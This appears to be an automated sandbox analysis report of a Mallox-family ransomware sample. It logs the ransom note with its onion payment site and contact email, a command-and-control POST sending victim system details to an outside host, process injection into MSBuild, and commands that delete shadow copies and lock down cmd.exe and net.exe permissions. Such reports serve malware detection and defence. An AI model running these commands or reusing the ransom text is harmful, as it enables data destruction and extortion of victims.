NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000015c filepath: C:\ProgramData\Microsoft\Network\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002c0 filepath: C:\ProgramData\Microsoft\OFFICE\DATA\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000015c filepath: C:\ProgramData\Microsoft\OFFICE\Heartbeat\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002c0 filepath: C:\ProgramData\Microsoft\OFFICE\UICaptions\1036\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002c0 filepath: C:\ProgramData\Microsoft\OFFICE\UICaptions\3082\FILE RECOVERY.txt	1
NtWriteFile July 27, 2023, 11:43 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002cc filepath: C:\ProgramData\Microsoft\OFFICE\UICaptions\FILE RECOVERY.txt	1

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (2 events)

Time & API	Arguments	Status	Return	Repeated
HttpSendRequestW July 27, 2023, 11:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1	0
HttpSendRequestW July 27, 2023, 11:44 a.m.	headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io request_handle: 0x00cc000c post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22	1	1	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1440 resumed a thread in remote process 2680
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x0000051c suspend_count: 1 process_identifier: 2680	1	0	0

Uses suspicious command line tools or Windows utilities (49 events)

cmdline	cacls C:\Windows\system32\cmd.exe /e /g Users:r
cmdline	cacls C:\Windows\system32\cmd.exe /g Administrators:f
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
cmdline	cacls C:\Windows\system32\net.exe /e /d system
cmdline	cacls C:\Windows\system32\net.exe /e /d mssqlserver
cmdline	cacls C:\Windows\system32\net.exe /e /d "network service"
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
cmdline	cacls C:\Windows\system32\net1.exe /g Administrators:f
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
cmdline	cacls C:\Windows\system32\net.exe /e /g Users:r
cmdline	cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
cmdline	cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
cmdline	cacls C:\Windows\system32\net1.exe /e /d mssqlserver
cmdline	cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
cmdline	cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
cmdline	cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
cmdline	cacls C:\Windows\SysWOW64\net1.exe /e /d system
cmdline	cacls C:\Windows\system32\cmd.exe /e /g system:r
cmdline	cacls C:\Windows\system32\net.exe /g Administrators:f
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
cmdline	C:\Windows\sysnative\vssadmin.exe delete shadows /all /quiet
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
cmdline	cacls C:\Windows\system32\cmd.exe /e /d SERVICE
cmdline	"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
cmdline	cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
cmdline	cacls C:\Windows\system32\net1.exe /e /g Administrators:r
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
cmdline	cacls C:\Windows\system32\net.exe /e /d SERVICE
cmdline	cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
cmdline	cacls C:\Windows\system32\net1.exe /e /g Users:r
cmdline	cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
cmdline	cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
cmdline	cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
cmdline	cacls C:\Windows\system32\cmd.exe /e /d "network service"
cmdline	cacls C:\Windows\system32\net1.exe /e /d system
cmdline	cacls C:\Windows\system32\net1.exe /e /d "network service"
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
cmdline	cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
cmdline	cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
cmdline	cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
cmdline	cacls C:\Windows\system32\net.exe /e /g Administrators:r
cmdline	cacls C:\Windows\SysWOW64\net.exe /e /d system
cmdline	cacls C:\Windows\system32\net1.exe /e /d SERVICE

Creates known Upatre files, registry keys and/or mutexes (1 event)

file	C:\Program Files (x86)\Hnc\Shared80\HwpTemplate\Draw\CP_Common\FILE RECOVERY.txt

Generates some ICMP traffic

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Cynet	Malicious (score: 100)
Sangfor	Suspicious.Win32.Save.a
VirIT	Trojan.Win32.MSIL_Heur.A
Cyren	W32/MSIL_Agent.FOC.gen!Eldorado
Symantec	MSIL.Downloader!gen8
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Generik.JBFBVKR
APEX	Malicious
Kaspersky	UDS:DangerousObject.Multi.Generic
Avast	KeyloggerX-gen [Trj]
Rising	Downloader.Remcos!8.10BBA (CLOUD)
McAfee-GW-Edition	Artemis!Trojan
Sophos	Mal/Generic-S
Ikarus	Win32.Outbreak
Webroot	W32.Trojan.Gen
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Microsoft	TrojanDownloader:MSIL/Remcos.CXJK!MTB
Google	Detected
McAfee	Artemis!F369250DB766
Cylance	unsafe
Panda	Trj/Chgt.AD
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
BitDefenderTheta	Gen:NN.ZemsilCO.36318.cm0@ayJbCcf
AVG	KeyloggerX-gen [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_70% (D)

Executed a process and injected code into it, probably while unpacking (50 out of 175 events)

Time & API	Arguments	Status	Return
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1440	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 1440	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 1440	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x000003b0 suspend_count: 1 process_identifier: 1440	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x000003c8 suspend_count: 1 process_identifier: 1440	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x000003f4 suspend_count: 1 process_identifier: 1440	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x0000044c suspend_count: 1 process_identifier: 1440	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x00000460 suspend_count: 1 process_identifier: 1440	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x00000480 suspend_count: 1 process_identifier: 1440	1	0
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2624 thread_handle: 0x00000570 process_identifier: 2620 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\Kill-Delete.bat" filepath_r: stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000564	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2684 thread_handle: 0x0000051c process_identifier: 2680 current_directory: filepath: track: 1 command_line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe filepath_r: stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000520	1	1
NtGetContextThread July 27, 2023, 11:43 a.m.	thread_handle: 0x0000051c	1	0
NtAllocateVirtualMemory July 27, 2023, 11:43 a.m.	process_identifier: 2680 region_size: 176128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000520	1	0
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄMa±&vaÄMt`±&vaRich°&vaPELYOdà\|ü§@°@ÈàÌ@8x@Ð.textôz\| `.rdata\@@.dataPK0@À.rsrcà&@@.relocÌ(@B base_address: 0x00400000 process_identifier: 2680 process_handle: 0x00000520	1	1
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: base_address: 0x00401000 process_identifier: 2680 process_handle: 0x00000520	1	1
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: base_address: 0x00419000 process_identifier: 2680 process_handle: 0x00000520	1	1
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: base_address: 0x00423000 process_identifier: 2680 process_handle: 0x00000520	1	1
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: 0 H`}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00428000 process_identifier: 2680 process_handle: 0x00000520	1	1
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: base_address: 0x00429000 process_identifier: 2680 process_handle: 0x00000520	1	1
WriteProcessMemory July 27, 2023, 11:43 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2680 process_handle: 0x00000520	1	1
NtSetContextThread July 27, 2023, 11:43 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4232103 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000051c process_identifier: 2680	1	0
NtResumeThread July 27, 2023, 11:43 a.m.	thread_handle: 0x0000051c suspend_count: 1 process_identifier: 2680	1	0
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2748 thread_handle: 0x00000088 process_identifier: 2744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\reg.exe track: 1 command_line: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2808 thread_handle: 0x00000084 process_identifier: 2804 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\takeown.exe track: 1 command_line: takeown /f C:\Windows\system32\cmd.exe /a filepath_r: C:\Windows\system32\takeown.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 3004 thread_handle: 0x0000008c process_identifier: 3000 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 1476 thread_handle: 0x00000084 process_identifier: 1488 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\system32\cmd.exe /g Administrators:f filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 1676 thread_handle: 0x00000094 process_identifier: 524 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2244 thread_handle: 0x0000008c process_identifier: 2272 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\system32\cmd.exe /e /g Users:r filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2128 thread_handle: 0x00000084 process_identifier: 2120 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2208 thread_handle: 0x00000094 process_identifier: 2180 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\system32\cmd.exe /e /g Administrators:r filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2808 thread_handle: 0x0000008c process_identifier: 2980 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 3052 thread_handle: 0x00000084 process_identifier: 2844 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\system32\cmd.exe /e /d SERVICE filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2852 thread_handle: 0x00000094 process_identifier: 2084 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2348 thread_handle: 0x0000008c process_identifier: 2336 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\system32\cmd.exe /e /d mssqlserver filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2652 thread_handle: 0x00000084 process_identifier: 2580 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 1044 thread_handle: 0x00000094 process_identifier: 792 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\system32\cmd.exe /e /d "network service" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2172 thread_handle: 0x0000008c process_identifier: 2148 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2816 thread_handle: 0x00000084 process_identifier: 2128 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\system32\cmd.exe /e /g system:r filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 3036 thread_handle: 0x00000094 process_identifier: 3060 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 3004 thread_handle: 0x0000008c process_identifier: 3048 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 1668 thread_handle: 0x00000094 process_identifier: 2532 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\takeown.exe track: 1 command_line: takeown /f C:\Windows\SysWOW64\cmd.exe /a filepath_r: C:\Windows\system32\takeown.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2292 thread_handle: 0x00000094 process_identifier: 2636 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2136 thread_handle: 0x00000084 process_identifier: 2652 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 3008 thread_handle: 0x00000090 process_identifier: 2172 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2204 thread_handle: 0x00000094 process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2648 thread_handle: 0x00000084 process_identifier: 2348 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2116 thread_handle: 0x00000090 process_identifier: 2780 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 2164 thread_handle: 0x00000094 process_identifier: 1340 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW July 27, 2023, 11:43 a.m.	thread_identifier: 316 thread_handle: 0x00000084 process_identifier: 2240 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cacls.exe track: 1 command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
